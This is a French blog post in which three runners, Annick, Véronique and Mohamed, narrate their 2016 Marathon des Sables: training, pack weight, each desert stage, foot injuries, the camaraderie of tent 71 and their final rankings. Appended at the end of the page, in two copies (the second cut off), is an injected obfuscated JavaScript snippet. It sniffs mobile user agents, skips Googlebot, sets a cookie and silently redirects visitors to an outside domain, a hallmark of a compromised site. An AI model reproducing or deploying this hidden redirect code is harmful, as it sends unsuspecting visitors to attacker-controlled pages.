Juin
07
2016

LES ULTRA COUREUSES AU MARATHON DES SABLES

mds_01

31ème édition de cette course mythique

Annick

Ce projet fou né entre Virginie, Véronique et moi-même lors du raid de la Saharienne en février 2015 a mobilisé beaucoup d’énergie, de temps, nous a transformées en « harceleuses » sur Facebook, à la recherche de sponsors prêts à nous aider à concrétiser ce rêve…et finalement, grâce à tous nos amis ayant mis des sous dans notre cagnotte, à mon primeur « Mario », à « BLB Déménagement Entreprise » et à nos petites économies, nous avons réussi à valider notre inscription ! Puis je rencontre Mohamed au Dust, lui aussi inscrit à cette course, il intègre ainsi notre team.

Fin janvier, nous attaquons la préparation ultime : des entraînements avec un sac chargé sur le dos et le début des réflexions, tests, pesées du matériel. C’est là qu’on a vraiment commencé à prendre la mesure de cette folie : 257km dans le désert marocain en autosuffisance totale excepté l’eau et la tente…on allait globalement courir avec sa maison sur le dos, dans le sable et sous 40 degrés…facile !!! C’est également à ce moment là que Virginie décide de renoncer au départ, sa reprise des entraînements depuis son opération des ligaments croisés ne lui ayant pas permis d’être prête pour ce monstre du désert.

Il nous faudra une semaine complète pour arriver à boucler ce sac le plus light possible : 7,2kg sans l’eau et je vous garantis qu’aujourd’hui, on maîtrise le poids d’un sac de couchage, des tee-shirts techniques, des barres de céréales…et le 7 avril au soir, je récupère ma petite Véro, nous sommes  prêtes à nous envoler le lendemain matin aux aurores pour Ouarzazate, à la fois impatientes et anxieuses…

Notre aventure va commencer dans l’avion avec Fabrice qui nous reconnaît grâce à l’article de Pascal Boutreau publié sur le site du MDS et discute avec moi : notre amitié commence, une véritable chance pour nous car dans le bus qui nous amène sur le lieu du 1er bivouac, il nous propose qu’on se joigne à lui et 2 autres gars pour partager la tente. Nous nous retrouvons ainsi avec Mohamed, Fabrice, Stéphane (Bebel) et Gilles dans cette fameuse tente 71 qui va se révéler un véritable lieu de rires, complicité, solidarité, éléments indispensables pour bien vivre le MDS ! Et pour couronner le tout, nos 3 nouveaux amis l’ont tous déjà fait et nous resterons à 6 au lieu de 8 dans la tente donc plus à l’aise au niveau espace.

Premier soir au bivouac, dernier « vrai apéro », avant de rendre nos valises le lendemain matin à l’organisation lors des contrôles médicaux et autres ; la bonne humeur est déjà bien présente entre nous, les premiers délires et fous rires commencent, du bonheur ! La nuit sera par contre très moyenne, notre tapis de sol est très mince et nos hanches ont déjà mal, ça promet. Véro accepte alors le matelas proposé par Gilles, elle s’alourdit de 200g, prix à payer pour mieux dormir !

Le lendemain, dernier jour de repos et 1er soir en autonomie : rituel du feu, 1er dîner lyophilisé mais encore un peu amélioré avec du saucisson, des graines…on se régale puis dodo, impatients de démarrer enfin cette course !

 

10 avril, réveil  vers 6h, il fait froid, on a du mal à sortir de notre duvet avec Véro mais il faut déjeuner, se préparer et les marocains n’attendent pas que l’on soit prêt pour nous enlever notre toit, on finira donc nos préparatifs à l’air libre, comme tous les autres coureurs ! Nous rejoignons enfin l’arche de départ pour écouter le briefing de Patrick Bauer, l’ambiance est à l’euphorie…

8h30, départ de cette 1ère étape de 34km avec 12km de dunes. Elles sont magnifiques mais épuisantes et c’est là que les premiers ennuis de Véro vont commencer : la couture de ses guêtres a lâché, donc opération rafistolage avec du strap, il va falloir que ça tienne 6 jours ! Sorties enfin des dunes, on se dit que l’on va enfin pouvoir courir…mais le vent en décide autrement ! Nous nous retrouvons dans une tempête, face au vent et là, impossible de courir, les rafales sont trop violentes ; par contre, on respire et mange du sable !

Nous finirons par franchir l’arche d’arrivée en compagnie de Bebel que nous rejoignons. Il nous aura fallu 6h50 en ayant couru peut être 6km mais par contre en ressemblant à de vrais ramoneurs et en se disant que si ces conditions sont les mêmes sur les autres jours, ce MDS va être un enfer ! De retour à la tente, nous enlevons nos runnings et découvrons chacune une ampoule au gros orteil, direction le staff médical (les docs). On en ressort avec une jolie poupée bien propre sur l’orteil, pour l’instant rien de grave !

Notre tente se retrouve peu à peu au complet au fur et à mesure des arrivées de chacun, (Momo, puis Véro, Bebel et moi, puis Fabrice et enfin Gilles, le spécialiste des queues de peloton de tous les ultras du monde) : le rituel du soir se met en place : enlever le maximum de cailloux sous le tapis de la tente, aller chercher du bois et préparer le feu (les gars), faire un brin de toilette (dans une petite cabine à l’abri des regards pour nous, les filles) avec notre gant imprégné et notre bassine, préparer et savourer nos différentes mixtures lyophilisées améliorées quand même par le jambon et le rhum arrangé de Gilles (oui oui, je vous promets que c’est vrai !!!), se glisser dans notre duvet…et rire !!! Apparemment, on est même trop bruyants puisqu’on se fait disputer par la tente voisine, il faut dire que le fou rire qui m’a pris ce soir là était pas mal et forcément très contagieux ! »

11 avril, 6h du matin, même réveil, même rituel avec notre toit qui disparaît brusquement : on prend vite des habitudes et on se retrouve sous l’arche de départ à la même heure, prêts à affronter les 42km de cette 2ème étape. »

Pas de vent, c’est bien mais nous savons donc que nous aurons très chaud…et ça va se confirmer. L’étape est beaucoup plus roulante que celle de la veille mais Véro a du mal à supporter cette chaleur, ses pieds deviennent douloureux, elle peine à courir. Elle veut que je la laisse mais je refuse jusqu’à ce que Fabrice nous rejoigne. J’hésite puis décide finalement de partir avec  lui, me disant que Véro pourra alors avancer à son propre rythme, sans risquer de se mettre trop dans le rouge. Je vais donc franchir cette 2ème arche aux côtés de Fabrice après 7h de course. Véro arrivera 1h après nous les pieds en feu…nouvelle visite aux docs et là, les choses vont commencer à sérieusement se compliquer pour elle, son 2ème gros orteil est vraiment blessé, on sait qu’elle ne pourra quasiment plus courir. Son moral en prend un coup mais la solidarité de la tente va agir, Gilles la prendra sous son aile pour l’épreuve du lendemain. Mohamed réalise de nouveau une très belle étape en 6h15, au top, et Bebel, quant à lui, se bat contre les douleurs de son dos qu’il a coincé quelques jours avant le MDS et vit sa course très frustré car il ne peut que trottiner alors que c’est un très bon coureur (top 100 lors de son dernier MDS).

12 avril…même heure, même rituel, nos traits sont juste un peu plus tirés mais c’est avec le sourire que nous rejoignons de nouveau l’arche de départ, Véro en queue avec Gilles, je suis rassurée.

C’est aux côtés de Bebel que je vais partir et ce jusqu’au CP1 puis on se perd, je gère désormais seule ma course ce qui ne me gêne pas plus que ça car j’ai l’habitude mais dans le désert c’est tout de même différent car les espaces roulants sont droits et réguliers, on n’a pas trop à surveiller sa pose d’appui et du coup, je m’ennuie ! Pas de causette avec les autres coureurs car la chaleur nous plombe, pas de musique dans les oreilles (erreur !) ; je me surprends même à surveiller mon allure à la montre, chose impensable en trail technique ! Du coup, j’avance plutôt bien et boucle cette épreuve en 5h30, ravie ! J’attends un peu anxieuse le retour de Gilles et Véro qui arrivent après 9h de course, Véro le moral dans les chaussettes, persuadée qu’elle ne tiendra jamais l’épreuve longue du lendemain. Encore une fois, toute la tente se mobilise pour la rebooster, nous lui préparons son diner pendant qu’elle est de nouveau chez les docs, Fabrice lui donne sa mousse au chocolat et on espère tous qu’elle ira mieux le lendemain !

13 avril…l’épreuve longue…84km…si nous la passons, normalement, nous allons au bout du MDS ! Vous vous doutez bien que nous sommes tous inquiets pour Véro : elle n’a jamais fait de course aussi longue, elle a les pieds en feu et ne peut pas courir…ça risque d’être très très long pour elle…j’espère juste que la douleur restera supportable car je ne doute pas de son mental. Heureusement, Gilles et Bebel seront avec elle.

8h30, comme tous les jours, nous nous élançons de nouveau à l’assaut de ce désert sans se douter de la difficulté de cette épreuve, en plus de sa longueur. Après le CP1 ascension du 1er jebel : impressionnant ! Une pente à 12% dans le sable avec un finish à 30% dans la rocaille avec une corde, j’ai tout simplement retrouvé les sensations de la Diagonale, chaleur en plus !

Ascension et descente tout aussi technique : 3km : 1h…ça va être long et je ne suis pas encore au bout de mes surprises puisqu’entre le km 35 et 55, nous ne sommes que dans des dunes et je ne dois courir que 3km je pense ! Le temps passe mais pas les km et c’est dur pour le mental alors je pense à ma pauvre petite Véro qui ne peut pas courir et ça me rebooste !

Puis, une bonne surprise m’attend au CP5 (55km) : Momo !!! qui avait, en plus, rêvé que je le rejoindrai au km55 ! Nous  sommes super contents de nous retrouver et décidons bien sûr de finir cette longue étape ensemble. Le soleil décline puis se couche, ça fait vraiment du bien de ne plus courir sous cette chaleur accablante ! Nous arriverons vers 22h45 après 14h30 de course environ, épuisés mais soulagés : c’est fait ! Nous retrouvons par contre Fabrice qui a abandonné, il ne voulait pas revivre la souffrance vécue lors de son 1er MDS. Nous nous couchons en pensant à nos 3 autres compagnons toujours en course, un peu inquiets pour Véro bien sûr : pourvu qu’elle tienne le coup ! Et elle tiendra ma warrior !!!! Elle passera 25h en course mais elle franchira l’arche d’arrivée !!!

Du coup, journée off : repos, lessive : ça fait du bien ! Et devinez quelle sera notre récompense ? Un coca bien frais offert par l’organisation, une nouvelle petite dose de rhum et quelques bonbons Haribo offerts par Gilles…le bonheur à l’état pur !!!!

14 avril : dernière étape de « course », le dernier marathon !

Dernière épreuve chronométrée, nous savons que nous touchons au but : devenir finisher du MDS !

Véro n’est plus inquiète, elle a passé la longue, ce n’est pas les derniers 42km qui vont l’arrêter, même si elle sera de nouveau seule à gérer sa course, Gilles ayant décidé de courir pour la dernière ! Elle me demande juste de continuer à « tout déchirer » pour la dernière et je vous promets que cette phrase va résonner dans ma tête lors des coups de fatigue de ce dernier marathon, m’interdisant de marcher puisque j’ai la chance d’avoir des pieds…une véritable équipe ! Je franchis cette dernière arche au bout de 5h22, ravie, soulagée, heureuse…j’ai terminé ce Marathon des Sables !!!!

Les autres arrivent peu à peu, tous animés du même soulagement et de la même fierté, il ne nous reste plus qu’à attendre et aller accueillir ma warrior de Véro qui franchira elle aussi cette arche…FABULEUX !!!

De retour sous notre tente 71, toute notre petite équipe va enfin pouvoir se détendre pour de bon. Il nous reste l’étape Unicef de 17km le lendemain mais nous avons décidé de la faire tous ensemble, en marchant, au rythme de Véro. Dernier repas lyophilisé, dernière mauvaise nuit sous la tente avec les hanches douloureuses…et le vent, pour la dernière, qui  a décidé de nous embêter de nouveau : tempête dans la nuit, on se retrouve tous emmitouflés dans nos duvets pour essayer de se protéger mais inutile de vous dire qu’au réveil, on a du sable partout !

Ce n’est pourtant pas ça qui va entamer notre bonne humeur…plus que 17km de marche pour obtenir cette médaille de Finisher alors on va parcourir cette ultime étape en râlant car on l’estime bien trop longue mais nos discussions vont bien faire passer ces 4h jusqu’à ce qu’enfin, nous franchissions cette arche et recevions notre médaille…le GRAAL du Marathon du MDS !!!

Heureux, fiers, nous grimpons dans le bus qui va nous conduire à Ouarzazate…une douche !!!! Quel bonheur de sentir l’eau couler sur nos corps fatigués, endoloris et bizarrement colorés et quel fou rire en découvrant la couleur de l’eau !!!

Une journée de tourisme et 2 soirées festives avec nos compagnons et nous reprenons l’avion vers Paris, cette aventure se termine mais reste encore tellement imprégnée dans nos têtes !

Mon  classement : 205ème/1150 ; 22èmeF/184 ; 3èmeV2F/46

Ce fut une course vraiment difficile en raison du sac, du sable, de la chaleur, des conditions de vie très précaires mais également une course magnifique par les paysages, les rencontres, les émotions (positives et négatives), le dépassement de soi…tout ce qu’on aime et qui nous fait vibrer !!!!

Un grand merci en tout cas à  Momo, Fabrice, Bebel et Gilles, les habitants de cette tente 71 qui nous ont permis de vivre un MDS très particulier et vraiment émouvant ; merci à tous les bénévoles de l’organisation qui ont toujours eu un sourire, des encouragements ; merci aux Doctrotters qui font vraiment des miracles avec nos pieds et ont permis à ma Véro d’aller au bout de cette folie ; merci à vous tous pour votre soutien, vos messages ; merci à Mario Primeurs, BLB  Déménagements Entreprise et tous ceux qui ont participé à notre cagnotte …sans votre soutien financier, ce projet n’aurait jamais abouti…et rendez-vous en 2018 !

Véronique

Je viens vers chacun de vous pour vous faire profiter en quelques lignes  de ma, de notre belle aventure.
C était une grande envie que de participer au mythique Marathon des Sables
Et puis un jour j’ai franchi le pas avec deux super runneuses » Annick et Virginie  » qui comme moi, rêvaient  de fouler le désert du Sahara.
Au fil des mois il a fallu se préparer, s’équiper … Et puis Virginie a dû abandonner pour raison médicale , j ai donc vécu cette aventure avec mon binôme de choc Annick.

Les entraînements furent difficiles mais « entraînement difficile guerre facile  » on m’a dit ; nous avons essayé de nous préparer au mieux…difficile quand on est novice de savoir gérer toute cette avant course.

J’ai écouté un peu les uns, les autres, j ai douté, j ai flanché, j’ai fait au mieux pour partir bien armée…

Le MDS a vraiment commencé  avec la préparation du sac, une nouveauté et un combat pour nous : de l’auto suffisance durant 6 jours !

Et puis nous nous sommes envolées ce 8 avril pour cette épopée fantastique,  un peu inquiètes, un peu excitées…
Un vol, une liaison en bus durant 6 heures et une arrivée sur le camp ! Voilà c’était parti, nous y étions enfin !
De belles rencontres, la tente 71 s’est formée : 3 super garçons et notre Mohamed, ami d’Annick, venu nous rejoindre.

Le contrôle du sac, la remise du dossard, la balise et puis dépôt de notre valise en consigne…la pression montait !

J 1 on ne pouvait plus reculer : parti !

Une première journée marquée par une tempête de sable, une chaleur abominable, un soleil qui brûle la peau, du sable qui s’ incruste partout … Ouah ! C’était ça le MDS !
Là, j ai compris ce qui m’attendait…

6h50  plus tard et 34 km dans les jambes, l’étape 1 était terminée !

Annick  m’a beaucoup encouragée, elle menait cette bataille comme une vraie guerrière, elle était plus aguerrie  que moi.

Première nuit difficile car le MDS, ce n’est pas qu’une course ! Quand on arrive à la tente berbère, il faut enlever les cailloux sous le tapis, se débarbouiller comme on peut avant la nuit, trouver un peu de bois, faire du feu manger et surtout vite dormir !

Les  soirées du MDS sont aussi vivantes et importantes que les journées, chacun soigne le bobo de l’autre, écoute, conseille, partage … une vrai potion magique que ce cocktail masculin de la tente 71 ! Nous avons été touchés par de grands  fous rires et pu immortaliser certains moments en photo pour vous. Six  jours dans une tente à 6, à tout partager, manger, dormir, se laver, vivre ensemble, ça crée des liens, je vous le dis !

Et les nuits ont toutes été  très froides, le sable nous fouettait le visage, rentrait dans notre duvet, le sol était dur et inconfortable, des nuits toutes très difficiles, un sommeil  morcelé et peu réparateur…

Le jour 2 était là : une chaleur abominable, un sac toujours trop lourd…et voilà un premier coup de chaud pour moi, des pieds brûlés, enflés et il a fallu se résoudre à laisser Annick partir, on avait dit « Jamais » mais là c’était inévitable, j étais au tapis jour 2 !

C’est grâce à la solidarité du MDS que j ai terminé, mais dans quel état ….
C’était la déprime à l’arrivée : un spectacle d’horreur en enlevant les chaussures, des pieds quelques peu mutilés d’ampoules…d’ongles disparus…. une grande tristesse et une grande peur pour la suite !

Le 3ème jour Annick est partie pour de vrai courir, vivre ce Marathon des Sables comme il se doit. J’ai marché, marché, mes pieds ne me permettaient plus de courir, ils étaient douloureux, même avec la meilleure volonté, une rage de vaincre : impossible ! Chaque pas était trop douloureux, je n’étais pas seule mais tellement triste, une étape de souffrance extrême et de désespoir. Heureusement que Gilles était avec moi !!!

Ce 3ème soir, mes pieds étaient définitivement mutilés par les ampoules, des lambeaux de peau à vif, j ai cru à la fin. J ai fait une visite à la clinique du MDS et j’ai vu les magiciens qui se sont attelés à réparer mes pieds pour continuer.
J ai pleuré, pleuré, je pensais que c’était fini, que pour moi ça allait s’arrêter là.
De retour à la tente, la cohésion m’a fait chaud au cœur : un repas chaud préparé,  un dessert chocolaté offert, c’était si bon !

 

De nouveau une nuit difficile et puis il a fallu repartir au 4ème jour pour la longue !

Que faire ? Continuer? Arrêter? Je ne faisais que penser et puis non c’était décidé : assez pleuré, j’irai au bout, coûte que coûte, en rampant s’il le fallait, pas d’abandon !!!

J’ai marché durant 26 h à parfois 2km/h jusque 5/6 max , j ai fait 90 km et j’ai franchi cette ligne d arrivée sous les yeux de mes collègues de tente et de mon Annick grandement inquiète.
J’ai souffert le martyr, vu le soleil  se coucher, marché, marché, vu le soleil se lever, ne jamais s’arrêter par peur de ne plus  pouvoir repartir.
J’ai fait des rencontres de gens des quatre coins de la planète, tous venus pour la même chose : aller plus loin, se dépasser, être finisher !
Ce fut la nuit la plus longue de mon existence,  j ai vu défiler  le film de ma vie, j ai pensé  à tout et n’importe quoi tout haut, pris des résolutions, envisager de nouvelles choses… mais surtout j’ai fini !!!

Le 5ème jour, plus de peur, juste la rage de finir, de passer, même en marchant à l’allure d’une limace !
A nouveau des ampoules, des jambes qui avaient triplé…une chaleur à crever mais voilà, j’étais au bout !!! J’ai franchi cette arche !!!!

Il ne restait que l étape solidaire où j allais retrouver mon Annick qui s’était arrêté de voler et mes garçons de la 71 qui m’attendaient pour me conduire au bout. Plus de chrono, juste arriver !

Une très belle aventure, forte en émotions, qui fait du bien !

Certains ont dit « elles sont givrées, folasses,  pétées du bulbe » mais je vous le dis, c’est une expérience folle qui fait grandir, ayez de l’audace et partez pour cet exploit qui vous rendra un moral en titane et restera inoubliable !

Aujourd’hui il ne reste que le plaisir de chacun de ces pas !
Surtout merci merci à tous pour vos messages, vos encouragements.
Je suis allée au bout pour moi et pour vous qui avez cru en moi
Je ne suis pas certaine de repartir mais je ne dis pas: jamais !

Saint Exupéry a écrit  » le véritable voyage, ce n’est pas de parcourir le désert ou de franchir de grandes distances sous-marines, c’est de parvenir en un point exceptionnel où la saveur de l’instant baigne tous les contours de la vie intérieure »

Mon classement : 754ème/1150 ; 95èmeF/184

Il y avait aussi Mohamed

Il y a de cela un an, je me suis inscrit à un certain Marathon des Sables édition 2016.
Une semaine après, j’ai commencé à regarder en détail les modalités, les conditions et le contexte de la course.
J’ai constaté du coup que c’était  légèrement différent des courses que je faisais avant.
Je me suis décidé du coup à améliorer mon endurance. Cela passe par des sorties longues, et des trails techniques.
En terme de sorties longues, j’en ai enchainé en Essonne et dans les Yvelines.
En terme de trails techniques, j’ai commencé par le 80 km de la Maxi-Race, puis le 80km du Mont Blanc, puis le 100 km des Templiers.
Après, je suis passé en préparation spécifique MDS: avec un 150 km au DUST suivi d’un stage de 200km sur le circuit du MDS.
Et enfin un programme spécifique avec ma team Bananacube.
Jusqu’au là tout marchait normalement: zéro blessure, condition physique optimale.

Et puis, à un mois de l’échéance, le corps commence à stresser:
– Ischios douloureux à 3 semaine du MDS
– Allergie alimentaire à 10 jours du MDS
Mais tout cela n’était que des alertes pour ne pas s’enflammer à quelques jours de l’échéance:
J’ai géré ces pépins de dernière minute, cela m’a permis de bien démarrer mon MDS.
Je n’oublierai pas les deux dernières semaines passées à ajuster le sac, à peser et repeser le contenu du sac, à optimiser le poids du sac.
Cette préparation logistique s’est faite en étroite coordination avec mes deux coéquipières MDS:
-Annick: Une vrai pile autochargeable: avec qui j’ai fait également le programme d’entrainements spécifiques MDS
-Véronique: Notre policière warrior. Une vrai battante au mental hors norme
Résultat: je pars avec un sac de 7.4kg

Et puis..
le 08/04/2016 Départ pour l’aventure: Arrivée le soir sur le camp de Merzouga, avec comme arrière plan les dunes de Merzouga qu’on doit affronter deux jours après.
Une fois au camp, je rejoins mes deux coéquipières qui sont arrivées 3 heures plutôt et qui ont déjà attéri à la fameuse tente71, ont fait la connaissance du trio d’enfer avec qui on partagera cette belle aventure:
-Gilles: Responsable d’une unité Offshore entre autres dans la vie, garantie de la bonne humeur à tout moment et à toute situation dans la tente71
-Stéphane: le seul à partir avec un grand handicap dans notre tente: des douleurs dans le dos avant de commencer le MDS. Mais il ne faut pas sous estimer ce jeune retraité de l’escadron des chasseurs alpins..
-Fabrice: Notre deuxième militaire dans la tente, symbole de convivialité et de solidarité.

Le 09/04/2016: tâches administratives, on profite des derniers repas normaux. Et surtout on se sépare de nos affaires et on ne garde que le sac qu’on portera sur le dos durant toute l’épreuve: un petit pincement au coeur: on y est !

Et puis le premier jour arrive: ça commence mal, vent très violent, puis après quelques kms de plat, on attaque les fameuses dunes de Merzouga.
On comptait sur la deuxième partie de l’étape pour courir sur du plat. Mais que nenni: un vent de 90km/h. C’est à peine si on arrive à marcher !
Bonne gestion => la tente 71 sort indemne de cette première épreuve.

Deuxième et troisième étape: Moins dures que la première mais on a gère: tant que la grande étape (4ème) n’est pas faite, il faut garder de l’énergie.
On note tout de même la grave blessure de Véronique au niveau des orteils: pas beau à voir, même si les DocTrotters font des miracles.

Du coup, pour l’étape longue, la solidarité a joué: surtout les blagues de Gilles pour faire passer la pilule.

Et l’étape longue fut là: Véronique avait comme binôme Gilles (belles photos au passage), Fabrice, Stéphane et moi, on fait le youyou et notre Annick en mode Diesel
Fabrice a jeté malheureusement l’éponge..
Stéphane a fini héroïquement cette étape: je rappelle qu’il a le dos en compote.
Et puis moi. Au 55eme Km: au début du coucher de soleil: je me repose sur un transat quand je vois venir comme une boule d’énergie: Annick. Enorme quand on sait que j’ai rêvé la nuit d’avant qu’elle allait me rattraper à ce même point kilométrique. Alors on finit les 29 derniers km ensemble, à coup de relances.

Et là je peux dire que y’a pas plus beau que de courir dans le désert, sous la fraicheur de la nuit: on oublie toute la fatigue de la journée.
Arrivés ensemble à 23h, on attend les autres colocataires de la tente71.

On a croisé Fabrice, avant qu’il ne reparte à Ourzazate avec les consignes d’Annick qui n’arrête pas de réclamer des fraises !
Puis Stéphane et Gilles arrivent au petit matin…ne manque plus que Véro !
Et le lendemain à 09h00: elle arriva. Elle l’a fait, une vrai warrior !!!

Un jour de repos…

Puis on attaque la dernière étape chronométrée:
Je pars comme une flèche: plus rien à perdre, c’est le moment de grignoter des places.
Tout se passe bien jusqu’au 27ème km où ma cheville me lâche. Après c’est de la pure souffrance pour les derniers 14km
Du coup, une dizaine de places perdues au lieu de les gagner.

Mais une belle 163 éme place pour une première participation !

Annick, qui est partie en mode Diesel m’a pris 30 minutes dans la dernière étape: chapeau bas !
Véro, qui finit malgré des orteils HS.
Stéphane qui se tient le dos mais qui finit.
Et Gilles que le sourire ne quitte pas: une vrai joie de vivre !
Sans oublier Fabrice qui nous attendait à Ourzazate pour faire la fête.

Et puis: l’étape Unicef de 17 km, faite en marchant ensemble de A à Z: c’est notre arrivée sur les Champs Elysées à nous.

On refait la course, on se marre, on prend des photos.

Puis le Finish, la photo Finish. On écrase une petite larme, puis on prend le bus direction Ourzazate où Fabrice nous attend.

Je tiens à remercier tous ceux qui nous ont envoyés des messages: ça nous stimulait et nous faisait pousser des ailes,

Je tiens à remercier toute l’orga aussi qui nous a chouchoutés, soutenus.

Je tiens à remercier aussi Virginie et Anne qui nous ont aidés pour la logistique,

Je tiens à remercier également Jean Charles, Claud , Elder Et ElMouaziz pour tous les conseils précieux: Merci Coachs

Enfin, Merci à toutes celles et ceux qui nous aidés de loin ou de près à venir à bout de notre MDS Oh combien réussi !!!!

Et pour conclure, RdV est déjà pris en 2018 avec au moins dix personnes autour de nous qui ont confirmé leur participation.

Mon classement : 163ème/1150 ;  60èmeV1H/347

 

La fameuse tente 71, c’est aussi Gilles

31 ème édition du Marathon des Sables, Une édition vraiment vraiment dure hihihi, avec des rencontres, des histoires, des souffrances, des pleurs , des fous rires , une ambiance incroyable, des soirées au coin du feu, des repas au Top et bien sur les mails…. Je ne regrette en rien, mon Rhum vanille Agrume, mon Jambon fumé de 650 gr et mes Haribo :0)))) …et bien sûr le Finish à la Dourya et au Byblos… Une petite aparté dans un monde trop bien réglé …

Et Stéphane (Bébel)

Et encore Fabrice

RENDEZ-VOUS EN 2018 !

mds_120

 

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s 